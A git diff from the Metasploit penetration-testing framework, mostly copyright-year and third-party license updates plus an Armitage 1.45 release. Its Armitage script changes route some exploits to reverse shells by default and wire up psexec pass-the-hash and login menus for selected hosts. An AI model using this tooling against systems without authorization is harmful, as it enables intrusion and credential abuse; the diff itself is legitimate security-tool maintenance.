diff --git a/.gitignore b/.gitignore index 5651548b7f..fa30beacb0 100644 --- a/.gitignore +++ b/.gitignore @@ -22,3 +22,4 @@ tags *.swp *.orig *.rej +*~ diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 33ec8a38e6..c98decf347 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -12,6 +12,11 @@ If your bug is new and you'd like to report it you will need to first](https://dev.metasploit.com/redmine/account/register). Don't worry, it's easy and fun and takes about 30 seconds. +When you file a bug report, please inclue your **steps to reproduce**, +full copy-pastes of Ruby stack traces, and any relevant details about +your environment. Without repro steps, your bug will likely be closed. +With repro steps, your bugs will likely be fixed. + ## Contributing Metasploit Modules If you have an exploit that you'd like to contribute to the Metasploit diff --git a/COPYING b/COPYING index ff03baf5f5..149b3b7611 100644 --- a/COPYING +++ b/COPYING @@ -1,4 +1,4 @@ -Copyright (C) 2006-2012, Rapid7 Inc. +Copyright (C) 2006-2013, Rapid7 Inc. All rights reserved. Redistribution and use in source and binary forms, with or without modification, diff --git a/THIRD-PARTY.md b/THIRD-PARTY.md index e5b46e4207..4bc94310c2 100644 --- a/THIRD-PARTY.md +++ b/THIRD-PARTY.md @@ -18,13 +18,17 @@ Ruby Copyright (c) 2004 David R. Halliday - The Zip library located under lib/zip. Copyright (C) 2002-2004 Thomas Sondergaard + - FastLib located at lib/fastlib.rb + Copyright (C) 2011 Rapid7 - Gem components located under lib/gemcache/ + * mime-types - Copyright (C) Austin Ziegler * rdoc - RDoc is Copyright (c) 2001-2003 Dave Thomas, The Pragmatic Programmers. Portions (c) 2007-2011 Eric Hodel. Portions copyright others, see individual files for details. * eventmachine - Copyright (C) 2006-07 by Francis Cianfrocca * json - Copyright Daniel Luz * pg - Copyright (c) 1997-2012 by the authors + * thin - Copyright (c) Marc-Andre Cournoyer @@ -85,42 +89,6 @@ Ruby ```` - -PacketFu -======== - - The PacketFu library located under lib/packetfu. - Copyright (c) 2008-2012, Tod Beardsley - -```` -Copyright (c) 2008-2012, Tod Beardsley -All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are met: - - * Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - * Neither the name of Tod Beardsley nor the - names of its contributors may be used to endorse or promote products - derived from this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY -EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY -DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -```` - - - GPL === - The modified TightVNC binaries and their associated source code. @@ -1016,39 +984,55 @@ OpenSSL License MIT === - - The SSHKey library located under lib/sshkey. + - The SSHKey library located under lib/sshkey/ Copyright (c) 2011 James Miller - - The Net::SSH library located under lib/net/ssh. + - The Net::SSH library located under lib/net/ssh/ Copyright (c) 2008 Jamis Buck - - Anemone located under lib/anemone + - Anemone located under lib/anemone/ Copyright (c) 2009 Vertive, Inc. - RKelly located under lib/rkelly/ Copyright (c) 2007, 2008, 2009 Aaron Patterson, John Barnette - - Gem components located under lib/gemcache + - Gem components located under lib/gemcache/ * actionmailer - Copyright (c) 2004-2011 David Heinemeier Hansson * actionpack - Copyright (c) 2004-2011 David Heinemeier Hansson * activemodel - Copyright (c) 2004-2011 David Heinemeier Hansson * activerecord - Copyright (c) 2004-2011 David Heinemeier Hansson * activeresource - Copyright (c) 2006-2011 David Heinemeier Hansson * activesupport - Copyright (c) 2005-2011 David Heinemeier Hansson + * acts_as_list - Copyright (c) 2007 David Heinemeier Hansson + * arel- Copyright (c) 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson * authlogic - Copyright (c) 2011 Ben Johnson of Binary Logic + * builder - Copyright (c) 2003-2012 Jim Weirich (jim.weirich@gmail.com) * carrierwave - Copyright (c) 2008-2012 Jonas Nicklas * chunky_png - Copyright (c) 2010 Willem van Bergen + * coderay - By Rob Aldred * daemons - Copyright (c) 2005-2012 Thomas Uehlinger - * diff-lcs - Copyright 2004–2011 Austin Ziegler + * diff-lcs - Copyright 2004-2011 Austin Ziegler + * erubis - copyright(c) 2006-2011 kuwata-lab.com all rights reserved. * formtastic - Copyright (c) 2008-2010 Justin French * fssm - Copyright (c) 2011 Travis Tilley * hike - Copyright (c) 2011 Sam Stephenson * i18n - Copyright (c) 2008 The Ruby I18n team + * ice_cube - Copyright (c) 2010-2012 John Crepezzi + * journey - Copyright (c) 2011 Aaron Patterson * jquery-rails - Copyright (c) 2010 Andre Arko * liquid - Copyright (c) 2005, 2006 Tobias Luetke + * mail - Copyright (c) 2009, 2010, 2011, 2012 Mikel Lindsaar + * metasploit_data_models - Copyright (c) 2012, Rapid7, Inc. * method_source - Copyright (c) 2011 John Mair (banisterfiend) * multi_json - Copyright (c) 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc. + * nokogiri - Copyright (c) 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada + * polyglot - Copyright (c) 2007 Clifford Heath + * prototype_legacy_helper - No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper) * rack - Copyright (c) 2007, 2008, 2009, 2010 Christian Neukirchen * rack-cache - Copyright (c) 2008 Ryan Tomayko * rack-ssl - Copyright (c) 2010 Joshua Peek + * rack-test - Copyright (c) 2008-2009 Bryan Helmkamp, Engine Yard Inc. + * railties - No copyright statement provided * rake - Copyright (c) 2003, 2004 Jim Weirich + * robots - Copyright (c) 2008 Kyle Maxwell, contributors * slop - Copyright (c) 2012 Lee Jarvis + * spork - Copyright (c) 2009 Tim Harper * sprockets - Copyright (c) 2011 Sam Stephenson, Copyright (c) 2011 Joshua Peek * state_machine - Copyright (c) 2006-2012 Aaron Pfeifer * thor - Copyright (c) 2008 Yehuda Katz @@ -1081,3 +1065,409 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ```` +3-Clause BSD +============ + - The PacketFu library located under lib/packetfu/ + Copyright (c) 2008-2012, Tod Beardsley + - The Kiss FFT library located under external/ruby-kissfft/ + Copyright (c) 2003-2010 Mark Borgerding + - The Kiss FFT wrapper layer, located under external/ruby-kissfft/ + Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com > + - Armitage, located under external/source/armitage and data/armitage/ + Copyright (C) 2010-2012 Raphael Mudge + +```` +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + + * Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + * Neither the name of Tod Beardsley nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY +EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY +DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +```` + + +Artistic 2.0 +============ + + - Gem components located under lib/gemcache/ + * win32-api - Copyright (c) 2003-2011, Daniel J. Berger + * win32-service - Copyright (c) 2003-2011, Daniel J. Berger + * windows-api - Copyright (c) 2003-2011, Daniel J. Berger + * windows-pr - Copyright (c) 2003-2011, Daniel J. Berger + +```` + +Artistic License 2.0 Copyright (c) 2000-2006, The Perl Foundation. + +Everyone is permitted to copy and distribute verbatim copies of this license +document, but changing it is not allowed. + +Preamble This license establishes the terms under which a given free software +Package may be copied, modified, distributed, and/or redistributed. The intent +is that the Copyright Holder maintains some artistic control over the +development of that Package while still keeping the Package available as open +source and free software. + +You are always permitted to make arrangements wholly outside of this license +directly with the Copyright Holder of a given Package. If the terms of this +license do not permit the full use that you propose to make of the Package, you +should contact the Copyright Holder and seek a different licensing arrangement. + +Definitions "Copyright Holder" means the individual(s) or organization(s) named +in the copyright notice for the entire Package. + +"Contributor" means any party that has contributed code or other material to +the Package, in accordance with the Copyright Holder's procedures. + +"You" and "your" means any person who would like to copy, distribute, or modify +the Package. + +"Package" means the collection of files distributed by the Copyright Holder, +and derivatives of that collection and/or of those files. A given Package may +consist of either the Standard Version, or a Modified Version. + +"Distribute" means providing a copy of the Package or making it accessible to +anyone else, or in the case of a company or organization, to others outside of +your company or organization. + +"Distributor Fee" means any fee that you charge for Distributing this Package +or providing support for this Package to another party. It does not mean +licensing fees. + +"Standard Version" refers to the Package if it has not been modified, or has +been modified only in ways explicitly requested by the Copyright Holder. + +"Modified Version" means the Package, if it has been changed, and such changes +were not explicitly requested by the Copyright Holder. + +"Original License" means this Artistic License as Distributed with the Standard +Version of the Package, in its current version or as it may be modified by The +Perl Foundation in the future. + +"Source" form means the source code, documentation source, and configuration +files for the Package. + +"Compiled" form means the compiled bytecode, object code, binary, or any other +form resulting from mechanical transformation or translation of the Source +form. + +Permission for Use and Modification Without Distribution (1) You are permitted +to use the Standard Version and create and use Modified Versions for any +purpose without restriction, provided that you do not Distribute the Modified +Version. + +Permissions for Redistribution of the Standard Version (2) You may Distribute +verbatim copies of the Source form of the Standard Version of this Package in +any medium without restriction, either gratis or for a Distributor Fee, +provided that you duplicate all of the original copyright notices and +associated disclaimers. At your discretion, such verbatim copies may or may not +include a Compiled form of the Package. + +(3) You may apply any bug fixes, portability changes, and other modifications +made available from the Copyright Holder. The resulting Package will still be +considered the Standard Version, and as such will be subject to the Original +License. + +Distribution of Modified Versions of the Package as Source (4) You may +Distribute your Modified Version as Source (either gratis or for a Distributor +Fee, and with or without a Compiled form of the Modified Version) provided that +you clearly document how it differs from the Standard Version, including, but +not limited to, documenting any non-standard features, executables, or modules, +and provided that you do at least ONE of the following: + +(a) make the Modified Version available to the Copyright Holder of the Standard +Version, under the Original License, so that the Copyright Holder may include +your modifications in the Standard Version. (b) ensure that installation of +your Modified Version does not prevent the user installing or running the +Standard Version. In addition, the Modified Version must bear a name that is +different from the name of the Standard Version. (c) allow anyone who receives +a copy of the Modified Version to make the Source form of the Modified Version +available to others under (i) the Original License or (ii) a license that +permits the licensee to freely copy, modify and redistribute the Modified +Version using the same licensing terms that apply to the copy that the licensee +received, and requires that the Source form of the Modified Version, and of any +works derived from it, be made freely available in that license fees are +prohibited but Distributor Fees are allowed. + +Distribution of Compiled Forms of the Standard Version or Modified Versions +without the Source (5) You may Distribute Compiled forms of the Standard +Version without the Source, provided that you include complete instructions on +how to get the Source of the Standard Version. Such instructions must be valid +at the time of your distribution. If these instructions, at any time while you +are carrying out such distribution, become invalid, you must provide new +instructions on demand or cease further distribution. If you provide valid +instructions or cease distribution within thirty days after you become aware +that the instructions are invalid, then you do not forfeit any of your rights +under this license. + +(6) You may Distribute a Modified Version in Compiled form without the Source, +provided that you comply with Section 4 with respect to the Source of the +Modified Version. + +Aggregating or Linking the Package (7) You may aggregate the Package (either +the Standard Version or Modified Version) with other packages and Distribute +the resulting aggregation provided that you do not charge a licensing fee for +the Package. Distributor Fees are permitted, and licensing fees for other +components in the aggregation are permitted. The terms of this license apply to +the use and Distribution of the Standard or Modified Versions as included in +the aggregation. + +(8) You are permitted to link Modified and Standard Versions with other works, +to embed the Package in a larger work of your own, or to build stand-alone +binary or bytecode versions of applications that include the Package, and +Distribute the result without restriction, provided the result does not expose +a direct interface to the Package. + +Items That are Not Considered Part of a Modified Version (9) Works (including, +but not limited to, modules and scripts) that merely extend or make use of the +Package, do not, by themselves, cause the Package to be a Modified Version. In +addition, such works are not considered parts of the Package itself, and are +not subject to the terms of this license. + +General Provisions (10) Any use, modification, and distribution of the Standard +or Modified Versions is governed by this Artistic License. By using, modifying +or distributing the Package, you accept this license. Do not use, modify, or +distribute the Package, if you do not accept this license. + +(11) If your Modified Version has been derived from a Modified Version made by +someone other than you, you are nevertheless required to ensure that your +Modified Version complies with the requirements of this license. + +(12) This license does not grant you the right to use any trademark, service +mark, tradename, or logo of the Copyright Holder. + +(13) This license includes the non-exclusive, worldwide, free-of-charge patent +license to make, have made, use, offer to sell, sell, import and otherwise +transfer the Package with respect to any patent claims licensable by the +Copyright Holder that are necessarily infringed by the Package. If you +institute patent litigation (including a cross-claim or counterclaim) against +any party alleging that the Package constitutes direct or contributory patent +infringement, then this Artistic License to you shall terminate on the date +that such litigation is filed. + +(14) Disclaimer of Warranty: THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER +AND CONTRIBUTORS "AS IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE +IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR +NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL LAW. +UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL BE LIABLE FOR +ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY +OUT OF THE USE OF THE PACKAGE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH +DAMAGE. + +```` + +Apache 2.0 +========== + + - Gem components located under lib/gemcache/ + * Msgpack - Copyright (c) 2008-2010 FURUHASHI Sadayuki + +```` + +Apache License +Version 2.0, January 2004 +http://www.apache.org/licenses/ + +TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + +1. Definitions. + +"License" shall mean the terms and conditions for use, reproduction, and +distribution as defined by Sections 1 through 9 of this document. + +"Licensor" shall mean the copyright owner or entity authorized by the copyright +owner that is granting the License. + +"Legal Entity" shall mean the union of the acting entity and all other entities +that control, are controlled by, or are under common control with that entity. +For the purposes of this definition, "control" means (i) the power, direct or +indirect, to cause the direction or management of such entity, whether by +contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the +outstanding shares, or (iii) beneficial ownership of such entity. + +"You" (or "Your") shall mean an individual or Legal Entity exercising +permissions granted by this License. + +"Source" form shall mean the preferred form for making modifications, including +but not limited to software source code, documentation source, and +configuration files. + +"Object" form shall mean any form resulting from mechanical transformation or +translation of a Source form, including but not limited to compiled object +code, generated documentation, and conversions to other media types. + +"Work" shall mean the work of authorship, whether in Source or Object form, +made available under the License, as indicated by a copyright notice that is +included in or attached to the work (an example is provided in the Appendix +below). + +"Derivative Works" shall mean any work, whether in Source or Object form, that +is based on (or derived from) the Work and for which the editorial revisions, +annotations, elaborations, or other modifications represent, as a whole, an +original work of authorship. For the purposes of this License, Derivative Works +shall not include works that remain separable from, or merely link (or bind by +name) to the interfaces of, the Work and Derivative Works thereof. + +"Contribution" shall mean any work of authorship, including the original +version of the Work and any modifications or additions to that Work or +Derivative Works thereof, that is intentionally submitted to Licensor for +inclusion in the Work by the copyright owner or by an individual or Legal +Entity authorized to submit on behalf of the copyright owner. For the purposes +of this definition, "submitted" means any form of electronic, verbal, or +written communication sent to the Licensor or its representatives, including +but not limited to communication on electronic mailing lists, source code +control systems, and issue tracking systems that are managed by, or on behalf +of, the Licensor for the purpose of discussing and improving the Work, but +excluding communication that is conspicuously marked or otherwise designated in +writing by the copyright owner as "Not a Contribution." + +"Contributor" shall mean Licensor and any individual or Legal Entity on behalf +of whom a Contribution has been received by Licensor and subsequently +incorporated within the Work. + +2. Grant of Copyright License. + +Subject to the terms and conditions of this License, each Contributor hereby +grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, +irrevocable copyright license to reproduce, prepare Derivative Works of, +publicly display, publicly perform, sublicense, and distribute the Work and +such Derivative Works in Source or Object form. + +3. Grant of Patent License. + +Subject to the terms and conditions of this License, each Contributor hereby +grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, +irrevocable (except as stated in this section) patent license to make, have +made, use, offer to sell, sell, import, and otherwise transfer the Work, where +such license applies only to those patent claims licensable by such Contributor +that are necessarily infringed by their Contribution(s) alone or by combination +of their Contribution(s) with the Work to which such Contribution(s) was +submitted. If You institute patent litigation against any entity (including a +cross-claim or counterclaim in a lawsuit) alleging that the Work or a +Contribution incorporated within the Work constitutes direct or contributory +patent infringement, then any patent licenses granted to You under this License +for that Work shall terminate as of the date such litigation is filed. + +4. Redistribution. + +You may reproduce and distribute copies of the Work or Derivative Works thereof +in any medium, with or without modifications, and in Source or Object form, +provided that You meet the following conditions: + +You must give any other recipients of the Work or Derivative Works a copy of +this License; and You must cause any modified files to carry prominent notices +stating that You changed the files; and You must retain, in the Source form of +any Derivative Works that You distribute, all copyright, patent, trademark, and +attribution notices from the Source form of the Work, excluding those notices +that do not pertain to any part of the Derivative Works; and If the Work +includes a "NOTICE" text file as part of its distribution, then any Derivative +Works that You distribute must include a readable copy of the attribution +notices contained within such NOTICE file, excluding those notices that do not +pertain to any part of the Derivative Works, in at least one of the following +places: within a NOTICE text file distributed as part of the Derivative Works; +within the Source form or documentation, if provided along with the Derivative +Works; or, within a display generated by the Derivative Works, if and wherever +such third-party notices normally appear. The contents of the NOTICE file are +for informational purposes only and do not modify the License. You may add Your +own attribution notices within Derivative Works that You distribute, alongside +or as an addendum to the NOTICE text from the Work, provided that such +additional attribution notices cannot be construed as modifying the License. +You may add Your own copyright statement to Your modifications and may provide +additional or different license terms and conditions for use, reproduction, or +distribution of Your modifications, or for any such Derivative Works as a +whole, provided Your use, reproduction, and distribution of the Work otherwise +complies with the conditions stated in this License. + +5. Submission of Contributions. + +Unless You explicitly state otherwise, any Contribution intentionally submitted +for inclusion in the Work by You to the Licensor shall be under the terms and +conditions of this License, without any additional terms or conditions. +Notwithstanding the above, nothing herein shall supersede or modify the terms +of any separate license agreement you may have executed with Licensor regarding +such Contributions. + +6. Trademarks. + +This License does not grant permission to use the trade names, trademarks, +service marks, or product names of the Licensor, except as required for +reasonable and customary use in describing the origin of the Work and +reproducing the content of the NOTICE file. + +7. Disclaimer of Warranty. + +Unless required by applicable law or agreed to in writing, Licensor provides +the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, +including, without limitation, any warranties or conditions of TITLE, +NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are +solely responsible for determining the appropriateness of using or +redistributing the Work and assume any risks associated with Your exercise of +permissions under this License. + +8. Limitation of Liability. + +In no event and under no legal theory, whether in tort (including negligence), +contract, or otherwise, unless required by applicable law (such as deliberate +and grossly negligent acts) or agreed to in writing, shall any Contributor be +liable to You for damages, including any direct, indirect, special, incidental, +or consequential damages of any character arising as a result of this License +or out of the use or inability to use the Work (including but not limited to +damages for loss of goodwill, work stoppage, computer failure or malfunction, +or any and all other commercial damages or losses), even if such Contributor +has been advised of the possibility of such damages. + +9. Accepting Warranty or Additional Liability. + +While redistributing the Work or Derivative Works thereof, You may choose to +offer, and charge a fee for, acceptance of support, warranty, indemnity, or +other liability obligations and/or rights consistent with this License. +However, in accepting such obligations, You may act only on Your own behalf and +on Your sole responsibility, not on behalf of any other Contributor, and only +if You agree to indemnify, defend, and hold each Contributor harmless for any +liability incurred by, or claims asserted against, such Contributor by reason +of your accepting any such warranty or additional liability. + +END OF TERMS AND CONDITIONS + +APPENDIX: How to apply the Apache License to your work + +To apply the Apache License to your work, attach the following boilerplate +notice, with the fields enclosed by brackets "[]" replaced with your own +identifying information. (Don't include the brackets!) The text should be +enclosed in the appropriate comment syntax for the file format. We also +recommend that a file or class name and description of purpose be included on +the same "printed page" as the copyright notice for easier identification +within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); you may not +use this file except in compliance with the License. You may obtain a copy of +the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, WITHOUT +WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the +License for the specific language governing permissions and limitations under +the License. + +```` diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 5520637f16..5ccd4ac15a 100755 Binary files a/data/armitage/armitage.jar and b/data/armitage/armitage.jar differ diff --git a/data/armitage/cortana.jar b/data/armitage/cortana.jar index 9297da44f3..28f15b5fd1 100644 Binary files a/data/armitage/cortana.jar and b/data/armitage/cortana.jar differ diff --git a/data/armitage/readme.txt b/data/armitage/readme.txt index fd8f0384a2..5f4e54b8e1 100755 --- a/data/armitage/readme.txt +++ b/data/armitage/readme.txt @@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first. 7. License ------- -(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license. +(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license. See section 8 for more information. lib/jgraphx.jar is used here within the terms of the BSD license offered by diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt index 207e8e00ff..5ea39884dd 100755 --- a/data/armitage/whatsnew.txt +++ b/data/armitage/whatsnew.txt @@ -1,6 +1,24 @@ Armitage Changelog ================== +4 Jan 13 (tested against msf 16252) +-------- +- Added a helper to set REXE option +- Added an icon to represent Windows 8 +- [host] -> Login menu is now built using open services for all + highlighted hosts, not just the first one. +- [host] -> Login items now escape punctuation characters in passwords + before passing them to a framework module. +- Added the windows and linux postgres_payload exploits to the use a + reverse payload by default list. +- Small tweak to allow Armitage to work with Metasploit 4.5 installed + environment on Windows. + +Cortana Updates (for scripters) +-------- +- &credential_add and &credential_delete no longer break when a + password has creative punctuation in it. + 26 Nov 12 (tested against msf 16114) --------- - Windows command shell tab is now friendlier to commands that prompt diff --git a/external/pcaprub/extconf.rb b/external/pcaprub/extconf.rb index fa87b197d1..872a7eed3a 100644 --- a/external/pcaprub/extconf.rb +++ b/external/pcaprub/extconf.rb @@ -9,7 +9,9 @@ puts "\n[*] Running checks for netifaces code added by metasploit project" puts "-----------------------------------------------------------------" #uncoment to force ioctl on non windows systems #@force_ioctl = true -@supported_archs = ["i386-mingw32", "i486-linux", "universal-darwin10.0", "i386-openbsd4.8","i386-freebsd8","arm-linux-eabi"] +@supported_archs = [ "i386-mingw32", "i486-linux", "x86_64-linux", + "universal-darwin10.0", "i386-openbsd4.8", "i386-freebsd8", + "arm-linux-eabi" ] #arm-linux-eabi tested on maemo5 / N900 puts "[*] Warning : this platform as not been tested" unless @supported_archs.include? RUBY_PLATFORM diff --git a/external/source/armitage/readme.txt b/external/source/armitage/readme.txt index fd8f0384a2..5f4e54b8e1 100644 --- a/external/source/armitage/readme.txt +++ b/external/source/armitage/readme.txt @@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first. 7. License ------- -(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license. +(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license. See section 8 for more information. lib/jgraphx.jar is used here within the terms of the BSD license offered by diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html index 29c402d999..85c4fe5dbb 100644 --- a/external/source/armitage/resources/about.html +++ b/external/source/armitage/resources/about.html @@ -1,9 +1,9 @@ -

Armitage 1.44

+

Armitage 1.45

An attack management tool for Metasploit® -
Release: 26 Nov 12

+
Release: 4 Jan 13


Developed by:

diff --git a/external/source/armitage/resources/windows8.png b/external/source/armitage/resources/windows8.png new file mode 100644 index 0000000000..3d2d2262b0 Binary files /dev/null and b/external/source/armitage/resources/windows8.png differ diff --git a/external/source/armitage/scripts-cortana/internal.sl b/external/source/armitage/scripts-cortana/internal.sl index 33cf09c107..d434f920da 100644 --- a/external/source/armitage/scripts-cortana/internal.sl +++ b/external/source/armitage/scripts-cortana/internal.sl @@ -243,14 +243,18 @@ sub session_exploit { # credentials API # +sub _fix_pass { + return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1'); +} + # credential_add("host", "port", "user, "pass", "type") sub credential_add { - cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P $4"); + cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P " . _fix_pass($4)); } # credential_delete("host", port, "user", "pass"); sub credential_delete { - cmd_safe("creds -a $1 -p $2 -u $3 -P $4 -d"); + cmd_safe("creds -a $1 -p $2 -u $3 -P " . _fix_pass($4) . " -d"); } sub credential_list { diff --git a/external/source/armitage/scripts/armitage.sl b/external/source/armitage/scripts/armitage.sl index b9a7354a6b..2cf69a9a97 100644 --- a/external/source/armitage/scripts/armitage.sl +++ b/external/source/armitage/scripts/armitage.sl @@ -59,6 +59,9 @@ sub showHost { else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) { push(@overlay, 'resources/windowsxp.png'); } + else if ("*8*" iswm $match) { + push(@overlay, 'resources/windows8.png'); + } else { push(@overlay, 'resources/windows7.png'); } diff --git a/external/source/armitage/scripts/attacks.sl b/external/source/armitage/scripts/attacks.sl index a1315b4ae8..4940fb4474 100644 --- a/external/source/armitage/scripts/attacks.sl +++ b/external/source/armitage/scripts/attacks.sl @@ -22,7 +22,7 @@ setMissPolicy(%results2, { return @(); }); # %exploits is populated in menus.sl when the client-side attacks menu is constructed # a list of exploits that should always use a reverse shell... this list needs to grow. -@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php"); +@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php", "windows/postgres/postgres_payload", "linux/postgres/postgres_payload"); # # generate menus for a given OS @@ -599,26 +599,28 @@ sub host_attack_items { } } - local('$service $name @options $a $port $foo'); + local('$name %options $a $port $host $service'); + %options = ohash(); - foreach $port => $service (%hosts[$2[0]]['services']) { - $name = $service['name']; - if ($port == 445 && "*Windows*" iswm getHostOS($2[0])) { - push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2))); - } - else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) { - push(@options, @($name, lambda(&show_login_dialog, \$service, $hosts => $2))); - } - else if ($name eq "microsoft-ds") { - push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2))); + foreach $host ($2) { + foreach $port => $service (%hosts[$host]['services']) { + $name = $service['name']; + if ($port == 445 && "*Windows*" iswm getHostOS($host)) { + %options["psexec"] = lambda(&pass_the_hash, $hosts => $2); + } + else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) { + %options[$name] = lambda(&show_login_dialog, \$service, $hosts => $2); + } + else if ($name eq "microsoft-ds") { + %options["psexec"] = lambda(&pass_the_hash, $hosts => $2); + } } } - if (size(@options) > 0) { + if (size(%options) > 0) { $a = menu($1, 'Login', 'L'); - foreach $service (@options) { - ($name, $foo) = $service; - item($a, $name, $null, $foo); + foreach $name (sorta(keys(%options))) { + item($a, $name, $null, %options[$name]); } } } @@ -678,6 +680,7 @@ sub addFileListener { $actions["SigningKey"] = $actions["*FILE*"]; $actions["Wordlist"] = $actions["*FILE*"]; $actions["WORDLIST"] = $actions["*FILE*"]; + $actions["REXE"] = $actions["*FILE*"]; # set up an action to choose a session $actions["SESSION"] = lambda(&chooseSession); diff --git a/external/source/armitage/scripts/menus.sl b/external/source/armitage/scripts/menus.sl index ff5320666e..7c70ba2d62 100644 --- a/external/source/armitage/scripts/menus.sl +++ b/external/source/armitage/scripts/menus.sl @@ -52,6 +52,7 @@ sub host_selected_items { item($i, '1. 95/98/2000', '1', setHostValueFunction($2, "os_name", "Micosoft Windows", "os_flavor", "2000")); item($i, '2. XP/2003', '2', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "XP")); item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista")); + item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8")); item($h, "Remove Host", 'R', clearHostFunction($2)); } diff --git a/external/source/armitage/scripts/passhash.sl b/external/source/armitage/scripts/passhash.sl index 058422c038..19feb846c3 100644 --- a/external/source/armitage/scripts/passhash.sl +++ b/external/source/armitage/scripts/passhash.sl @@ -41,6 +41,7 @@ import ui.*; # strip any funky characters that will cause this call to throw an exception $user = replace($user, '\P{Graph}', ""); + $hash = fixPass($hash); [$queue addCommand: $null, "creds -a $host -p 445 -t smb_hash -u $user -P $hash"]; } 